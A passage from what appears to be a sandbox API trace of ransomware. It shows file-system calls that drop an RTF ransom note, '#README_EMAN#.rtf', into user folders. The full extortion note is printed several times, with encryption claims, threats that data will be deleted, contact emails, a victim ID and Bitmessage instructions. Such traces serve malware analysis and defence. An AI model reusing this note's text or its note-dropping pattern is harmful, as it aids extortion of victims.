ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nà ðý\x1dLúj\x8d\x94$á6]jIÑ\x80Cãa âcN", lpUsedDefaultChar=0x0) returned 8717 [0206.381] WriteFile (in: hFile=0x2cc, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0206.382] CloseHandle (hObject=0x2cc) returned 1 [0206.382] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\-omfrxhku4htqhef7\\k-jt3_ff8y22f3ge\\#readme_eman#.rtf")) returned 0x20 [0206.382] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\-omfrxhku4htqhef7\\k-jt3_ff8y22f3ge\\fqtqkxshtz5\\#readme_eman#.rtf")) returned 0xffffffff [0206.382] GetLastError () returned 0x2 [0206.383] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\-omfrxhku4htqhef7\\k-jt3_ff8y22f3ge\\fqtqkxshtz5\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0206.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l 